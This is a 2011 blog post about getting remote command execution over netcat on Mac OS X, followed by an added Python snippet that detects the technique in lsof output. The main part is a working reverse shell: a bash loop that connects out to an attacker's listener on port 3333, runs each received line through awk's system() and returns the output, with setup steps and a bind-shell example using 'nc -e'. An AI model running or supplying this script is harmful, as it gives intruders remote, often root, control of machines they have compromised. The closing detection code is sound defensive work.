November 12, 2011

NC remote execution on Mac OS X

Background

Netcat is a built-in utility in Mac OS X. To quote from its manual page (run man nc for more details):
The nc (or netcat) utility is used for just about anything under the sun involving TCP or UDP. It can open TCP connections, send UDP packets, listen on arbitrary TCP and UDP ports, do port scanning, and deal with both IPv4 and IPv6. Unlike telnet(1), nc scripts nicely, and separates error messages onto standard error instead of sending them to standard output, as telnet(1) does with some.
If you download netcat for Windows or Linux, you will see that the "-e" or "-c" flags are available. These flags mean that whoever connects can execute commands on the system running netcat with them, e.g. the server runs nc -l -p [port_number] -e cmd.exe (or /bin/bash on Linux), while the attacker only needs to run nc [server_address] [port_number]. After connecting to the server, the attacker can run any system command on the remote server.

Issue
I was testing various versions of netcat on my Mac OS X; none of them worked in the execution mode above. Some of you would say that Mac OS X is only a permutation of FreeBSD, however the bottom line is that it won't work.

Solution
In order to work around the limitation on executing system commands, I developed the following bash script, which opens a reverse connection from the attacked server to the attacking machine.
Please follow the steps below:
1. Open a listener on the attacker's machine. Run:
nc -k -l 3333
The state should be as shown in the following screenshot:
2. Copy the source code to the file ncmac.sh on the server (I used nano ncmac.sh)
#!/bin/bash
# Seed the result file with a banner so the first connection sends something.
echo 'Started NC remote execution for Mac OS X by NirV ' > ~/result
while :
do
# Send the previous command's output to the attacker's listener.
cat ~/result | nc [attacker_ip] 3333
# Read one line from the attacker, run it, and store its output for the next round.
nc [attacker_ip] 3333 | head -n 1 | awk '{system($0); print $0}' > ~/result
done
Note: If you can't open nano because of attack limitations, another option is to "echo" the text above into the file, e.g. echo "[paste above text]" > ncmac.sh
3. Run sh ncmac.sh

Now the server has opened a reverse connection to the attacker's machine, and the attacker is able to run any command; for example, the result of whoami is root (rather than nirv, the user on the attacker's machine):

NOTE: Sometimes the attacker needs to type the system command a few times until the server responds.
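From the defender's side, the loop above leaves a recognisable trace on the compromised host: a stream of short-lived nc processes, each holding an established outbound TCP connection to the same remote endpoint. The following is an added example (not part of the original post) that scans lsof -i -n -P output for exactly that pattern; the lsof lines are constructed sample input, and the process names checked are an assumption.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample of `lsof -i -n -P` output (not captured from a real host):
# two nc children of the ncmac.sh loop calling back to 203.0.113.7:3333 as root.
SAMPLE_LSOF = """\
COMMAND   PID USER   FD   TYPE             DEVICE SIZE/OFF NODE NAME
sshd      101 root    4u  IPv4 0x1a2b3c4d5e6f7081      0t0  TCP *:22 (LISTEN)
nc        812 root    3u  IPv4 0x1a2b3c4d5e6f7082      0t0  TCP 10.0.0.5:49321->203.0.113.7:3333 (ESTABLISHED)
Safari    455 nirv   21u  IPv4 0x1a2b3c4d5e6f7083      0t0  TCP 10.0.0.5:49400->198.51.100.2:443 (ESTABLISHED)
nc        813 root    3u  IPv4 0x1a2b3c4d5e6f7084      0t0  TCP 10.0.0.5:49322->203.0.113.7:3333 (ESTABLISHED)
nc        990 nirv    3u  IPv4 0x1a2b3c4d5e6f7085      0t0  TCP 127.0.0.1:50000->127.0.0.1:8080 (ESTABLISHED)
"""

# Columns: COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME; only TCP rows
# whose NAME field reads "local->remote (STATE)" are parsed.
LINE_RE = re.compile(
    r"^(?P<cmd>\S+)\s+(?P<pid>\d+)\s+(?P<user>\S+)\s+(?:\S+\s+){4}"
    r"TCP\s+(?P<local>\S+)->(?P<remote>\S+)\s+\((?P<state>[A-Z_]+)\)$"
)
NETCAT_NAMES = {"nc", "netcat", "ncat"}  # assumed binary names to watch

@dataclass(frozen=True)
class Finding:
    pid: int
    user: str
    remote: str  # "host:port" the netcat process connected out to

def _is_loopback(host: str) -> bool:
    return host.startswith("127.") or host in ("[::1]", "::1")

def find_netcat_outbound(lsof_text: str) -> list[Finding]:
    """Netcat processes holding an ESTABLISHED TCP connection to a
    non-loopback remote endpoint, i.e. a connection this host initiated."""
    findings = []
    for line in lsof_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["cmd"] not in NETCAT_NAMES or m["state"] != "ESTABLISHED":
            continue
        host, _port = m["remote"].rsplit(":", 1)
        if _is_loopback(host):
            continue  # local tooling talking to itself, not a reverse connection
        findings.append(Finding(int(m["pid"]), m["user"], m["remote"]))
    return findings

def callback_endpoints(findings: list[Finding]) -> dict[str, int]:
    """Count findings per remote endpoint: the while-loop shows up as repeated
    nc connections to one endpoint rather than a single long-lived session."""
    return dict(Counter(f.remote for f in findings))
```

Running find_netcat_outbound over a periodic lsof snapshot and alerting when callback_endpoints reports the same endpoint more than once, or any hit as root, catches this loop without needing the script's file name.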